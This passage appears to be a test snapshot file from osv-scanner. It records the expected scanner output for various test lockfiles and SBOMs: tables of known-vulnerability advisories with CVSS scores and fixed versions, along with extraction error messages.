testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ --- [TestCommand_LocalDatabases/one_specific_supported_sbom_with_vulns - 4] --- [TestCommand_LocalDatabases/one_specific_unsupported_lockfile - 1] Scanning dir ./testdata/locks-many/not-a-lockfile.toml --- [TestCommand_LocalDatabases/one_specific_unsupported_lockfile - 2] No package sources found, --help for usage information. --- [TestCommand_LocalDatabases/one_specific_unsupported_lockfile - 3] Scanning dir ./testdata/locks-many/not-a-lockfile.toml --- [TestCommand_LocalDatabases/one_specific_unsupported_lockfile - 4] No package sources found, --help for usage information. --- [TestCommand_LocalDatabases/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 2] --- [TestCommand_LocalDatabases/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 3] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 4] --- [TestCommand_LocalDatabases/output_format:_markdown_table - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip No issues found --- [TestCommand_LocalDatabases/output_format:_markdown_table - 2] --- [TestCommand_LocalDatabases/output_format:_markdown_table - 3] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip No issues found --- [TestCommand_LocalDatabases/output_format:_markdown_table - 4] --- [TestCommand_LocalDatabases/output_with_json - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_LocalDatabases/output_with_json - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip --- [TestCommand_LocalDatabases/output_with_json - 3] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_LocalDatabases/output_with_json - 4] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip --- [TestCommand_LocalDatabases_AlwaysOffline/a_bunch_of_different_lockfiles_and_ecosystem - 1] Scanning dir ./testdata/locks-requirements Scanning dir ./testdata/locks-many-with-insecure Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Scanned /testdata/locks-requirements/my-requirements.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-dev.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-transitive.txt file and found 4 packages Scanned /testdata/locks-requirements/requirements.prod.txt file and found 1 package Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Scanned /testdata/locks-requirements/the_requirements_for_test.txt file and found 1 package Scanned /testdata/locks-requirements/unresolvable-requirements.txt file and found 3 packages Filtered 1 local/unscannable package/s from the scan. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand_LocalDatabases_AlwaysOffline/a_bunch_of_different_lockfiles_and_ecosystem - 2] could not load db for RubyGems ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for Alpine ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for Packagist ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for npm ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for PyPI ecosystem: unable to fetch OSV database: no offline version of the OSV database is available --- [TestCommand_LocalDatabases_AlwaysOffline/a_bunch_of_different_lockfiles_and_ecosystem - 3] Scanning dir ./testdata/locks-requirements Scanning dir ./testdata/locks-many-with-insecure Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Scanned /testdata/locks-requirements/my-requirements.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-dev.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-transitive.txt file and found 4 packages Scanned /testdata/locks-requirements/requirements.prod.txt file and found 1 package Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Scanned /testdata/locks-requirements/the_requirements_for_test.txt file and found 1 package Scanned /testdata/locks-requirements/unresolvable-requirements.txt file and found 3 packages Filtered 1 local/unscannable package/s from the scan. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand_LocalDatabases_AlwaysOffline/a_bunch_of_different_lockfiles_and_ecosystem - 4] could not load db for RubyGems ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for Alpine ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for Packagist ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for npm ecosystem: unable to fetch OSV database: no offline version of the OSV database is available could not load db for PyPI ecosystem: unable to fetch OSV database: no offline version of the OSV database is available --- [TestCommand_LockfileWithExplicitParseAs/"apk-installed"_is_supported - 1] Scanned /testdata/locks-many/installed file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/"apk-installed"_is_supported - 2] --- [TestCommand_LockfileWithExplicitParseAs/"dpkg-status"_is_supported - 1] Scanned /testdata/locks-many/status file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/"dpkg-status"_is_supported - 2] --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_are_automatically_escaped_on_windows - 1] Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_are_automatically_escaped_on_windows - 2] --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_can_have_explicit_parse_as - 1] --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_can_have_explicit_parse_as - 2] Error during extraction: (extracting as javascript/packagelockjson) /testdata/locks-many/yarn.lock: could not extract: invalid character '#' looking for beginning of value extraction failed on specified lockfile --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_work_with_explicit_escaping - 1] Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/absolute_paths_work_with_explicit_escaping - 2] --- [TestCommand_LockfileWithExplicitParseAs/empty_is_default - 1] Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_LockfileWithExplicitParseAs/empty_is_default - 2] --- [TestCommand_LockfileWithExplicitParseAs/empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows) - 1] --- [TestCommand_LockfileWithExplicitParseAs/empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows) - 2] failed to resolve path: stat /path/to/my:file: no such file or directory --- [TestCommand_LockfileWithExplicitParseAs/empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows)#01 - 1] --- [TestCommand_LockfileWithExplicitParseAs/empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows)#01 - 2] failed to resolve path: stat /path/to/my:project/package-lock.json: no such file or directory --- [TestCommand_LockfileWithExplicitParseAs/files_that_error_on_parsing_stop_parsable_files_from_being_checked - 1] Scanning dir ./testdata/locks-insecure Scanning dir ./testdata/locks-many --- [TestCommand_LockfileWithExplicitParseAs/files_that_error_on_parsing_stop_parsable_files_from_being_checked - 2] Error during extraction: (extracting as rust/cargolock) /testdata/locks-insecure/my-package-lock.json: could not extract: toml: line 1: expected '.' or '=', but got '{' instead extraction failed on specified lockfile --- [TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic - 1] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/my-package-lock.json file and found 1 package Scanned /testdata/locks-insecure/my-yarn.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 3 packages affected by 3 known vulnerabilities (1 Critical, 2 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 3 vulnerabilities can be fixed. +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-package-lock.json | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-yarn.lock | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ --- [TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic - 2] --- [TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic_2 - 1] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/my-package-lock.json file and found 1 package Scanned /testdata/locks-insecure/my-yarn.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 3 packages affected by 3 known vulnerabilities (1 Critical, 2 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 3 vulnerabilities can be fixed. +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-package-lock.json | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-yarn.lock | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ --- [TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic_2 - 2] --- [TestCommand_LockfileWithExplicitParseAs/one_lockfile_with_local_path - 1] Scanned /testdata/locks-many/replace-local.mod file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. No issues found --- [TestCommand_LockfileWithExplicitParseAs/one_lockfile_with_local_path - 2] --- [TestCommand_LockfileWithExplicitParseAs/parse-as_takes_priority,_even_if_it's_wrong - 1] --- [TestCommand_LockfileWithExplicitParseAs/parse-as_takes_priority,_even_if_it's_wrong - 2] Error during extraction: (extracting as javascript/packagelockjson) /testdata/locks-many/yarn.lock: could not extract: invalid character '#' looking for beginning of value extraction failed on specified lockfile --- [TestCommand_LockfileWithExplicitParseAs/unsupported_parse-as - 1] --- [TestCommand_LockfileWithExplicitParseAs/unsupported_parse-as - 2] could not determine extractor, requested my-file --- [TestCommand_LockfileWithExplicitParseAs/when_an_explicit_parse-as_is_given,_it's_applied_to_that_file - 1] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/my-package-lock.json file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 2 known vulnerabilities (1 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 2 vulnerabilities can be fixed. +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-insecure/my-package-lock.json | +-------------------------------------+------+-----------+------------------+---------+---------------+----------------------------------------------+ --- [TestCommand_LockfileWithExplicitParseAs/when_an_explicit_parse-as_is_given,_it's_applied_to_that_file - 2] --- [TestCommand_MoreLockfiles/Package.resolved_-_Unsupported_ecosystem,_should_not_be_scanned - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_MoreLockfiles/Package.resolved_-_Unsupported_ecosystem,_should_not_be_scanned - 2] could not determine extractor suitable to this file: "/testdata/locks-scalibr/Package.resolved" --- [TestCommand_MoreLockfiles/Podfile.lock_-_Unsupported_ecosystem,_should_not_be_scanned - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_MoreLockfiles/Podfile.lock_-_Unsupported_ecosystem,_should_not_be_scanned - 2] could not determine extractor suitable to this file: "/testdata/locks-scalibr/Podfile.lock" --- [TestCommand_MoreLockfiles/cabal.project.freeze - 1] Scanned /testdata/locks-scalibr/cabal.project.freeze file and found 6 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +--------------------------------+------+-----------+-----------------+---------+---------------+---------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+-----------------+---------+---------------+---------------------------------------------+ | https://osv.dev/HSEC-2024-0009 | | Hackage | biscuit-haskell | 0.3.0.0 | 0.4.0.0 | testdata/locks-scalibr/cabal.project.freeze | +--------------------------------+------+-----------+-----------------+---------+---------------+---------------------------------------------+ --- [TestCommand_MoreLockfiles/cabal.project.freeze - 2] --- [TestCommand_MoreLockfiles/depsjson - 1] Scanned /testdata/locks-scalibr/depsjson file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+--------------------------+---------+---------------+---------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+--------------------------+---------+---------------+---------------------------------+ | https://osv.dev/GHSA-4cv2-4hjh-77rx | | NuGet | System.Linq.Dynamic.Core | 1.3.7 | 1.6.0 | testdata/locks-scalibr/depsjson | +-------------------------------------+------+-----------+--------------------------+---------+---------------+---------------------------------+ --- [TestCommand_MoreLockfiles/depsjson - 2] --- [TestCommand_MoreLockfiles/gems.locked - 1] Scanned /testdata/locks-scalibr/gems.locked file and found 26 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 6 known vulnerabilities (0 Critical, 2 High, 1 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 6 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+------------------------------------+ | https://osv.dev/GHSA-9m3q-rhmv-5q44 | 7.5 | RubyGems | json | 2.10.1 | 2.10.2 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-353f-x4gh-cqq8 | | RubyGems | nokogiri | 1.18.2 | 1.18.9 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-5w6v-399v-w3cc | | RubyGems | nokogiri | 1.18.2 | 1.18.8 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-mrxw-mxhj-p664 | 7.8 | RubyGems | nokogiri | 1.18.2 | 1.18.4 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-vvfq-8hwr-qm4m | | RubyGems | nokogiri | 1.18.2 | 1.18.3 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-wx95-c6cv-8532 | 5.3 | RubyGems | nokogiri | 1.18.2 | 1.19.1 | testdata/locks-scalibr/gems.locked | +-------------------------------------+------+-----------+----------+---------+---------------+------------------------------------+ --- [TestCommand_MoreLockfiles/gems.locked - 2] --- [TestCommand_MoreLockfiles/packages.config - 1] Scanned /testdata/locks-scalibr/packages.config file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_MoreLockfiles/packages.config - 2] --- [TestCommand_MoreLockfiles/packages.lock.json - 1] Scanned /testdata/locks-scalibr/packages.lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_MoreLockfiles/packages.lock.json - 2] --- [TestCommand_MoreLockfiles/stack.yaml.lock - 1] Scanned /testdata/locks-scalibr/stack.yaml.lock file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_MoreLockfiles/stack.yaml.lock - 2] --- [TestCommand_MoreLockfiles/uv.lock - 1] Scanned /testdata/locks-scalibr/uv.lock file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 2 known vulnerabilities (0 Critical, 2 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 2 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+--------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+--------------------------------+ | https://osv.dev/GHSA-7gcm-g887-7qv7 | 8.2 | PyPI | protobuf | 4.25.5 | 5.29.6 | testdata/locks-scalibr/uv.lock | | https://osv.dev/GHSA-8qvm-5x2c-j2w7 | 8.2 | PyPI | protobuf | 4.25.5 | 4.25.8 | testdata/locks-scalibr/uv.lock | +-------------------------------------+------+-----------+----------+---------+---------------+--------------------------------+ --- [TestCommand_MoreLockfiles/uv.lock - 2] --- [TestCommand_Transitive/invalid_data_source_error - 1] --- [TestCommand_Transitive/invalid_data_source_error - 2] unsupported data-source "github" - must be one of: deps.dev, native --- [TestCommand_Transitive/pom.xml_enricher_requires_extractor - 1] Scanning dir ./testdata/maven-transitive/abc.xml --- [TestCommand_Transitive/pom.xml_enricher_requires_extractor - 2] No package sources found, --help for usage information. --- [TestCommand_Transitive/pom.xml_multiple_registries - 1] Scanned /testdata/maven-transitive/registry.xml file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 6 known vulnerabilities (2 Critical, 1 High, 3 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 6 vulnerabilities can be fixed. +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ | https://osv.dev/GHSA-cm6r-892j-jv2g | 6.1 | Maven | com.google.android.gms:play-services-basement | 10.0.0 | 18.0.2 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-7rjr-3q55-vv33 | 9.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.16.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-8489-44mv-ggj8 | 6.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.1 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-jfh8-c2jp-5v3q | 10.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.15.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-p6xc-xr62-6r2g | 8.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-vc5p-v9hr-52mj | 6.3 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.25.3 | testdata/maven-transitive/registry.xml | +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ --- [TestCommand_Transitive/pom.xml_multiple_registries - 2] --- [TestCommand_Transitive/pom.xml_no_resolve_no_transitive - 1] Scanning dir ./testdata/maven-transitive/pom.xml Scanned /testdata/maven-transitive/pom.xml file and found 1 package No issues found --- [TestCommand_Transitive/pom.xml_no_resolve_no_transitive - 2] --- [TestCommand_Transitive/pom.xml_non_utf8_encoding - 1] Scanned /testdata/maven-transitive/encoding.xml file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+-------------+---------+---------------+----------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | 